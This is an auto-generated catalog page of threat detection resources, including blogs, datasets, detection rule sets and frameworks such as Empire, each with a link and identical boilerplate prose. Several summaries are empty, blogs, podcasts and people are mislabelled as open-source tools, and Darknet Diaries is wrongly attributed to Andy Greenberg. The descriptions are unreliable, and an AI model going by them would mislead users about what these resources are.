Open-Source Cybersecurity Tools: Threat Detection

← Back to Open-Source Cybersecurity Tools Hub | Full Open Source Catalog | Main Atlas

This category contains 116 documented tools. It focuses on capabilities used for baseline hardening, monitoring integration, and defense-in-depth validation. Use this section when building shortlists, comparing operational tradeoffs, and mapping controls to detection/response ownership.

Category Evaluation Checklist

• Coverage depth against your highest-priority threats and compliance obligations.
• Operational overhead for deployment, tuning, and long-term maintenance.
• Signal quality versus analyst workload and false-positive pressure.
• Integration fit with SIEM, ticketing, identity, cloud, and engineering workflows.
• Governance readiness including auditability, ownership clarity, and change control.

Jump by Name

A | B | C | D | E | G | H | I | J | L | M | N | O | P | R | S | T | W | Y

Letter A

This letter section contains 11 tools.

A Research-Driven process applied to Threat Detection Engineering Inputs

• Website: https://ateixei.medium.com/a-research-driven-process-applied-to-threat-detection-engineering-inputs-1b7e6fe0412b
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: A Research-Driven process applied to Threat Detection Engineering Inputs is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: .

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

A Simple Hunting Maturity Model

• Website: http://detect-respond.blogspot.com.au/2015/10/a-simple-hunting-maturity-model.html
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: A Simple Hunting Maturity Model is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: The Hunting Maturity Model describes five levels of organizational hunting capability, ranging from HMM0 (the least capability) to HMM4 (the most).

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Frameworks.

Back to Name Jump

Actionable Detects

• Website: https://prezi.com/vejpnxkm85ih/actionable-detects-dns-keynote/
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Actionable Detects is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Blue Team Tactics.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > DNS.

Back to Name Jump

Active Directory Threat Hunting

• Website: https://adsecurity.org/wp-content/uploads/2017/04/2017-BSidesCharm-DetectingtheElusive-ActiveDirectoryThreatHunting-Final.pdf
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Active Directory Threat Hunting is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Windows.

Back to Name Jump

adversary_emulation_library

• Website: https://github.com/center-for-threat-informed-defense/adversary_emulation_library
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: adversary_emulation_library is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: An open library of adversary emulation plans designed to empower organizations to test their defenses based on real-world TTPs.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Threat Simulation Resources.

Back to Name Jump

Alerting and Detection Strategies Framework

• Website: https://github.com/palantir/alerting-detection-strategy-framework
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Alerting and Detection Strategies Framework is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: A framework for developing alerting and detection strategies.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Frameworks.

Back to Name Jump

Alerting and Detection Strategy Framework

• Website: https://medium.com/@palantir/alerting-and-detection-strategy-framework-52dc33722df2
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Alerting and Detection Strategy Framework is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

Alexandre Teixeira

• Website: https://ateixei.medium.com
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Alexandre Teixeira is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Blogs.

Back to Name Jump

An Introduction to HTTP fingerprinting

• Website: https://www.net-square.com/httprint_paper.html
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: An Introduction to HTTP fingerprinting is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Fingerprinting.

Back to Name Jump

Anton Chuvakin

• Website: https://medium.com/anton-on-security
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Anton Chuvakin is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Blogs.

Back to Name Jump

attack_data

• Website: https://github.com/splunk/attack_data
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: attack_data is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: A repository of curated datasets from various attacks.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Dataset.

Back to Name Jump

Letter B

This letter section contains 7 tools.

Boss of the SOC (BOTS) Dataset Version 1

• Website: https://github.com/splunk/botsv1
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Boss of the SOC (BOTS) Dataset Version 1 is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Dataset.

Back to Name Jump

Boss of the SOC (BOTS) Dataset Version 2

• Website: https://github.com/splunk/botsv2
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Boss of the SOC (BOTS) Dataset Version 2 is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Dataset.

Back to Name Jump

Boss of the SOC (BOTS) Dataset Version 3

• Website: https://github.com/splunk/botsv3
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Boss of the SOC (BOTS) Dataset Version 3 is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Dataset.

Back to Name Jump

botconf 2016 Slides

• Website: https://www.botconf.eu/wp-content/uploads/2016/11/PR12-Sysmon-UELTSCHI.pdf
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: botconf 2016 Slides is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: , ).

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Windows > Sysmon.

Back to Name Jump

Bro-Osquery

• Website: https://github.com/bro/bro-osquery
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Bro-Osquery is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Bro integration with osquery.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Tools.

Back to Name Jump

Brosquery

• Website: https://github.com/jandre/brosquery
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Brosquery is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: A module for osquery to load Bro logs into tables.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Tools.

Back to Name Jump

BZAR

• Website: https://github.com/mitre-attack/bzar
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: BZAR is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: (Bro/Zeek ATT&CK-based Analytics and Reporting) - A set of Zeek scripts to detect ATT&CK techniques.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Tools.

Back to Name Jump

Letter C

This letter section contains 5 tools.

C2 Matrix

• Website: https://www.thec2matrix.com/matrix
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: C2 Matrix is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: ().

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Threat Simulation Resources.

Back to Name Jump

Capability Abstraction

• Website: https://posts.specterops.io/capability-abstraction-fbeaeeb26384
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Capability Abstraction is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: ().

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

CIC Datasets

• Website: https://www.unb.ca/cic/datasets/index.html
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: CIC Datasets is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Canadian Institute for Cybersecurity datasets.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Dataset.

Back to Name Jump

Cyber Kill Chain

• Website: https://www.lockheedmartin.com/us/what-we-do/aerospace-defense/cyber/cyber-kill-chain.html
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Cyber Kill Chain is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: It is part of the Intelligence Driven Defense® model for identification and prevention of cyber intrusions activity. The model identifies what the adversaries must complete in order to achieve their objective.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Frameworks.

Back to Name Jump

CyberThreatHunting

• Website: https://github.com/A3sal0n/CyberThreatHunting
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: CyberThreatHunting is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: A collection of resources for threat hunters.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

Letter D

This letter section contains 10 tools.

Darknet Diaries

• Website: https://darknetdiaries.com
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Darknet Diaries is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: by Andy Greenberg - True stories from the dark side of the Internet.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Podcasts.

Back to Name Jump

Data Science Hunting Funnel

• Website: http://www.austintaylor.io/network/traffic/threat/data/science/hunting/funnel/machine/learning/domain/expertise/2017/07/11/data-science-hunting-funnel/
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Data Science Hunting Funnel is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

data_hacking

• Website: https://github.com/SuperCowPowers/data_hacking
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: data_hacking is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Examples of using IPython, Pandas, and Scikit Learn to get the most out of your security data.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Data Science.

Back to Name Jump

Detecting DNS Tunneling

• Website: https://www.sans.org/reading-room/whitepapers/dns/detecting-dns-tunneling-34152
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Detecting DNS Tunneling is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > DNS.

Back to Name Jump

Detecting dynamic DNS domains in Splunk

• Website: https://www.splunk.com/blog/2015/08/04/detecting-dynamic-dns-domains-in-splunk.html
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Detecting dynamic DNS domains in Splunk is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > DNS.

Back to Name Jump

Detection Engineering Weekly

• Website: https://www.detectionengineering.net
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Detection Engineering Weekly is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: by Zack 'techy' Allen.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Newsletters.

Back to Name Jump

Detection Spectrum

• Website: https://posts.specterops.io/detection-spectrum-198a0bfb9302
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Detection Spectrum is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: ().

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

Detection: Challenging Paradigms

• Website: https://www.dcppodcast.com/all-episodes
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Detection: Challenging Paradigms is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: by SpecterOps.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Podcasts.

Back to Name Jump

DetectionLab

• Website: https://github.com/clong/DetectionLab/
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: DetectionLab is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Vagrant & Packer scripts to build a lab environment complete with security tooling and logging best practices.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Tools.

Back to Name Jump

DNS is NOT Boring

• Website: https://www.first.org/resources/papers/conf2017/DNS-is-NOT-Boring-Using-DNS-to-Expose-and-Thwart-Attacks.pdf
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: DNS is NOT Boring is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Using DNS to Expose and Thwart Attacks.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > DNS.

Back to Name Jump

Letter E

This letter section contains 6 tools.

Effective TLS Fingerprinting Beyond JA3

• Website: https://www.ntop.org/ndpi/effective-tls-fingerprinting-beyond-ja3/
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Effective TLS Fingerprinting Beyond JA3 is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Fingerprinting.

Back to Name Jump

Elastic Detection Rules

• Website: https://github.com/elastic/detection-rules
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Elastic Detection Rules is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Detection Rules.

Back to Name Jump

Empire

• Website: https://github.com/EmpireProject/Empire
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection, Awesome Cyber Security Tools, Awesome Hacking

What it does: Empire is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: A post exploitation framework for powershell and python.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Threat Simulation Tools.

Back to Name Jump

EQL

• Website: https://github.com/endgameinc/eql
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: EQL is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Event Query Language.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Tools.

Back to Name Jump

EQLLib

• Website: https://github.com/endgameinc/eqllib
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: EQLLib is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: The Event Query Language Analytics Library (eqllib) is a library of event based analytics, written in EQL to detect adversary behaviors identified in MITRE ATT&CK™.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Tools.

Back to Name Jump

Expert Investigation Guide - Threat Hunting

• Website: https://github.com/Foundstone/ExpertInvestigationGuides/tree/master/ThreatHunting
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

